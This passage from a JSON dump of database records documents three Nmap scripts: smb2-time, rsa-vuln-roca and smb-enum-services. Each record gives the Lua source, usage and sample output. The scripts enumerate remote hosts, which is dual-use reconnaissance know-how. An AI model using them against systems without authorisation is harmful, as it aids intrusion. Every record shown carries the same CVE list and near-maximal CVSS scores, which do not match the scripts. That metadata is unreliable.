smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p445 --script smb2-time <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb2-time:\n | date: 2017-07-28 03:06:34\n |_ start_date: 2017-07-20 09:29:49\n \n\n## Requires \n\n * [os](<>)\n * [datetime](<../lib/datetime.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [smb2](<../lib/smb2.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-28T09:01:02", "type": "nmap", "title": "smb2-time NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-01-18T21:21:43", "id": "NMAP:SMB2-TIME.NSE", "href": "https://nmap.org/nsedoc/scripts/smb2-time.html", "sourceData": "local os = require \"os\"\nlocal datetime = require \"datetime\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal smb2 = require \"smb2\"\n\ndescription = [[\nAttempts to obtain the current system date and the start date of a SMB2 server.\n]]\n\n---\n-- @usage nmap -p445 --script smb2-time <target>\n--\n-- @output\n-- Host script results:\n-- | smb2-time:\n-- | date: 2017-07-28 03:06:34\n-- |_ start_date: 2017-07-20 09:29:49\n--\n-- @xmloutput\n-- <elem key=\"date\">2017-07-28 03:07:57</elem>\n-- <elem key=\"start_date\">2017-07-20 09:29:49</elem>\n---\n\nauthor = \"Paulino Calderon <calderon()websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"default\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host,port)\n local smbstate, status\n local output = stdnse.output_table()\n status, smbstate = smb.start(host)\n status = smb2.negotiate_v2(smbstate)\n\n if status then\n datetime.record_skew(host, smbstate.time, os.time())\n stdnse.debug2(\"SMB2: Date: %s (%s) Start date:%s (%s)\",\n smbstate['date'], smbstate['time'],\n smbstate['start_date'], smbstate['start_time'])\n output.date = smbstate['date']\n output.start_date = smbstate['start_date']\n return output\n else\n stdnse.debug2(\"Negotiation failed\")\n return \"Protocol negotiation failed (SMB2)\"\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:03", "description": "Detects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization. \n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library. \n\nReferences: \n\n * <https://crocs.fi.muni.cz/public/papers/rsa_ccs17>\n\n### See also:\n\n * [ ssl-cert.nse ](<../scripts/ssl-cert.html>)\n * [ ssh-hostkey.nse ](<../scripts/ssh-hostkey.html>)\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 22,443 --script rsa-vuln-roca <target>\n \n\n## Script Output \n\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [openssl](<../lib/openssl.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [ssh2](<../lib/ssh2.html>)\n * [sslcert](<../lib/sslcert.html>)\n * [math](<>)\n * [string](<>)\n * [vulns](<../lib/vulns.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-18T20:26:42", "type": "nmap", "title": "rsa-vuln-roca NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-24T19:36:04", "id": "NMAP:RSA-VULN-ROCA.NSE", "href": "https://nmap.org/nsedoc/scripts/rsa-vuln-roca.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal openssl = stdnse.silent_require \"openssl\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal ssh2 = require \"ssh2\"\nlocal sslcert = require \"sslcert\"\nlocal math = require \"math\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nDetects RSA keys vulnerable to Return Of Coppersmith Attack (ROCA) factorization.\n\nSSH hostkeys and SSL/TLS certificates are checked. The checks require recent updates to the openssl NSE library.\n\nReferences:\n* https://crocs.fi.muni.cz/public/papers/rsa_ccs17\n]]\n\n---\n-- @usage\n-- nmap -p 22,443 --script rsa-vuln-roca <target>\n--\n-- @output\n--\n--@xmloutput\n--\n-- @see ssl-cert.nse\n-- @see ssh-hostkey.nse\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\n-- only run this script if the target host is NOT a private (RFC1918) IP address)\n-- and the port is an open SSL service\nportrule = function(host, port)\n if not openssl.bignum_div then\n stdnse.verbose1(\"This script requires the latest update to NSE's openssl library bindings.\")\n return false\n end\n -- SSH key check\n return shortport.port_or_service(22, \"ssh\")\n -- same criteria as ssl-cert.nse\n or shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function is_vulnerable (modulus)\n local dec2bn = openssl.bignum_dec2bn\n -- Prime tests used under MIT license from https://github.com/crocs-muni/roca\n local prime_tests = nmap.registry.roca_prime_tests or {\n {dec2bn(\"3\"), dec2bn(\"6\")},\n {dec2bn(\"5\"), dec2bn(\"30\")},\n {dec2bn(\"7\"), dec2bn(\"126\")},\n {dec2bn(\"11\"), dec2bn(\"1026\")},\n {dec2bn(\"13\"), dec2bn(\"5658\")},\n {dec2bn(\"17\"), dec2bn(\"107286\")},\n {dec2bn(\"19\"), dec2bn(\"199410\")},\n {dec2bn(\"23\"), dec2bn(\"8388606\")},\n {dec2bn(\"29\"), dec2bn(\"536870910\")},\n {dec2bn(\"31\"), dec2bn(\"2147483646\")},\n {dec2bn(\"37\"), dec2bn(\"67109890\")},\n {dec2bn(\"41\"), dec2bn(\"2199023255550\")},\n {dec2bn(\"43\"), dec2bn(\"8796093022206\")},\n {dec2bn(\"47\"), dec2bn(\"140737488355326\")},\n {dec2bn(\"53\"), dec2bn(\"5310023542746834\")},\n {dec2bn(\"59\"), dec2bn(\"576460752303423486\")},\n {dec2bn(\"61\"), dec2bn(\"1455791217086302986\")},\n {dec2bn(\"67\"), dec2bn(\"147573952589676412926\")},\n {dec2bn(\"71\"), dec2bn(\"20052041432995567486\")},\n {dec2bn(\"73\"), dec2bn(\"6041388139249378920330\")},\n {dec2bn(\"79\"), dec2bn(\"207530445072488465666\")},\n {dec2bn(\"83\"), dec2bn(\"9671406556917033397649406\")},\n {dec2bn(\"89\"), dec2bn(\"618970019642690137449562110\")},\n {dec2bn(\"97\"), dec2bn(\"79228162521181866724264247298\")},\n {dec2bn(\"101\"), dec2bn(\"2535301200456458802993406410750\")},\n {dec2bn(\"103\"), dec2bn(\"1760368345969468176824550810518\")},\n {dec2bn(\"107\"), dec2bn(\"50079290986288516948354744811034\")},\n {dec2bn(\"109\"), dec2bn(\"473022961816146413042658758988474\")},\n {dec2bn(\"113\"), dec2bn(\"10384593717069655257060992658440190\")},\n {dec2bn(\"127\"), dec2bn(\"144390480366845522447407333004847678774\")},\n {dec2bn(\"131\"), dec2bn(\"2722258935367507707706996859454145691646\")},\n {dec2bn(\"137\"), dec2bn(\"174224571863520493293247799005065324265470\")},\n {dec2bn(\"139\"), dec2bn(\"696898287454081973172991196020261297061886\")},\n {dec2bn(\"149\"), dec2bn(\"713623846352979940529142984724747568191373310\")},\n {dec2bn(\"151\"), dec2bn(\"1800793591454480341970779146165214289059119882\")},\n {dec2bn(\"157\"), dec2bn(\"126304807362733370595828809000324029340048915994\")},\n {dec2bn(\"163\"), dec2bn(\"11692013098647223345629478661730264157247460343806\")},\n {dec2bn(\"167\"), dec2bn(\"187072209578355573530071658587684226515959365500926\")},\n }\n nmap.registry.roca_prime_tests = prime_tests\n\n --stdnse.debug1(\"Testing %s\", openssl.bignum_bn2dec(modulus))\n for _, test in ipairs(prime_tests) do\n local prime, fingerprint = test[1], test[2]\n local _, bnshift = openssl.bignum_div(modulus, prime)\n -- prime is small, so bnshift is small. Safe to convert to Lua integer\n local string_shift = openssl.bignum_bn2dec(bnshift)\n local shift = math.tointeger(string_shift)\n if not shift then\n stdnse.debug1(\"Unable to convert %s to integer\", string_shift)\n return nil\n end\n --stdnse.debug1(\"Testing mod %s, shift is %s\", openssl.bignum_bn2dec(prime), shift)\n if not openssl.bignum_is_bit_set(fingerprint, shift) then\n stdnse.debug1(\"Not vulnerable\")\n return nil\n end\n end\n stdnse.debug1(\"VULNERABLE!!!!!!\")\n\n return \"Vulnerable to ROCA\"\nend\n\nlocal function ssl_get_modulus(host, port)\n local ok, cert = sslcert.getCertificate(host, port)\n if not ok then\n stdnse.debug1(\"failed to obtain SSL certificate\")\n return nil\n end\n\n if cert.pubkey.type ~= \"rsa\" then\n stdnse.debug1(\"Non-RSA certificate, not vulnerable to ROCA\")\n return nil\n end\n\n local modulus = cert.pubkey.modulus\n if not modulus then\n stdnse.debug1(\"No modulus available; upgrade Nmap?\")\n return nil\n end\n return modulus\nend\n\nlocal function ssh_get_modulus(host, port)\n local key = ssh2.fetch_host_key( host, port, \"ssh-rsa\" )\n if not key then\n stdnse.debug1(\"No RSA hostkey, not vulnerable to ROCA\")\n return nil\n end\n local _, e, n = string.unpack(\">s4s4s4\", key.fp_input)\n return openssl.bignum_bin2bn(n)\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"ROCA: Vulnerable RSA generation\",\n state = vulns.STATE.NOT_VULN,\n -- TODO: Update when CVE is scored\n --risk_factor = \"High\",\n description = [[\n The Infineon RSA library 1.02.013 in Infineon Trusted Platform Module (TPM)\n firmware, such as versions before 0000000000000422 - 4.34, before\n 000000000000062b - 6.43, and before 0000000000008521 - 133.33, mishandles\n RSA key generation, which makes it easier for attackers to defeat various\n cryptographic protection mechanisms via targeted attacks, aka ROCA.\n ]],\n IDS = {CVE = \"CVE-2017-15361\"},\n references = {\n \"https://crocs.fi.muni.cz/public/papers/rsa_ccs17\",\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local modulus\n if shortport.ssl(host, port) or sslcert.isPortSupported(port) or sslcert.getPrepareTLSWithoutReconnect(port) then\n modulus = ssl_get_modulus(host, port)\n elseif shortport.port_or_service(22, \"ssh\")(host, port) then\n modulus = ssh_get_modulus(host, port)\n end\n\n if modulus and is_vulnerable(modulus) then\n vuln_table.state = vulns.STATE.VULN\n end\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:34", "description": "Retrieves the list of services running on a remote Windows system. Each service attribute contains service name, display name and service status of each service. \n\nNote: Modern Windows systems requires a privileged domain account in order to list the services. \n\nReferences: \n\n * <https://technet.microsoft.com/en-us/library/bb490995.aspx>\n * <https://en.wikipedia.org/wiki/Windows_service>\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script smb-enum-services.nse -p445 <host>\n nmap --script smb-enum-services.nse --script-args smbusername=<username>,smbpass=<password> -p445 <host>\n \n\n## Script Output \n \n \n | smb-enum-services:\n |\n | ALG:\n | display_name: Application Layer Gateway Service\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | ClipSrv:\n | display_name: ClipBook\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | COMSysApp:\n | display_name: COM+ System Application\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | Dfs:\n | display_name: Distributed File System\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | ImapiService:\n | display_name: IMAPI CD-Burning COM Service\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | IsmServ:\n | display_name: Intersite Messaging\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | LicenseService:\n | display_name: License Logging\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | mnmsrvc:\n | display_name: NetMeeting Remote Desktop Sharing\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | MSDTC:\n | display_name: Distributed Transaction Coordinator\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_INTERROGATE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_PARAMCHANGE\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | NtFrs:\n | display_name: File Replication\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | RDSessMgr:\n | display_name: Remote Desktop Help Session Manager\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | rpcapd:\n | display_name: Remote Packet Capture Protocol v.0 (experimental)\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | RpcLocator:\n | display_name: Remote Procedure Call (RPC) Locator\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | Spooler:\n | display_name: Print Spooler\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_INTERROGATE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_PARAMCHANGE\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | swprv:\n | display_name: Microsoft Software Shadow Copy Provider\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | SysmonLog:\n | display_name: Performance Logs and Alerts\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | TlntSvr:\n | display_name: Telnet\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | TPVCGateway:\n | display_name: TP VC Gateway Service\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | Tssdis:\n | display_name: Terminal Services Session Directory\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | UMWdf:\n | display_name: Windows User Mode Driver Framework\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | UPS:\n | display_name: Uninterruptible Power Supply\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | vds:\n | display_name: Virtual Disk Service\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | VGAuthService:\n | display_name: VMware Alias Manager and Ticket Service\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | VMTools:\n | display_name: VMware Tools\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_INTERROGATE\n | SERVICE_CONTROL_NETBINDDISABLE\n | SERVICE_CONTROL_PAUSE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_PARAMCHANGE\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | vmvss:\n | display_name: VMware Snapshot Provider\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | VMware Physical Disk Helper Service:\n | display_name: VMware Physical Disk Helper Service\n | state:\n | SERVICE_PAUSE_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_RUNNING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n | SERVICE_CONTROL_CONTINUE\n | SERVICE_CONTROL_NETBINDADD\n | SERVICE_CONTROL_STOP\n | SERVICE_CONTROL_NETBINDENABLE\n | VSS:\n | display_name: Volume Shadow Copy\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n | controls_accepted:\n |\n | WmiApSrv:\n | display_name: WMI Performance Adapter\n | state:\n | SERVICE_STOPPED\n | SERVICE_STOP_PENDING\n | SERVICE_CONTINUE_PENDING\n | SERVICE_PAUSED\n | type:\n | SERVICE_TYPE_WIN32\n | SERVICE_TYPE_WIN32_OWN_PROCESS\n |_ controls_accepted:\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-05T18:19:11", "type": "nmap", "title": "smb-enum-services NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-22T17:29:49", "id": "NMAP:SMB-ENUM-SERVICES.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-enum-services.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nRetrieves the list of services running on a remote Windows system.\nEach service attribute contains service name, display name and service status of\neach service.\n\nNote: Modern Windows systems requires a privileged domain account in order to\nlist the services.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/bb490995.aspx\n* https://en.wikipedia.org/wiki/Windows_service\n]]\n\n---\n-- @usage\n-- nmap --script smb-enum-services.nse -p445 <host>\n-- nmap --script smb-enum-services.nse --script-args smbusername=<username>,smbpass=<password> -p445 <host>\n--\n-- @output\n-- | smb-enum-services:\n-- |\n-- | ALG:\n-- | display_name: Application Layer Gateway Service\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | ClipSrv:\n-- | display_name: ClipBook\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | COMSysApp:\n-- | display_name: COM+ System Application\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | Dfs:\n-- | display_name: Distributed File System\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | ImapiService:\n-- | display_name: IMAPI CD-Burning COM Service\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | IsmServ:\n-- | display_name: Intersite Messaging\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | LicenseService:\n-- | display_name: License Logging\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | mnmsrvc:\n-- | display_name: NetMeeting Remote Desktop Sharing\n-- | state:\n-- | 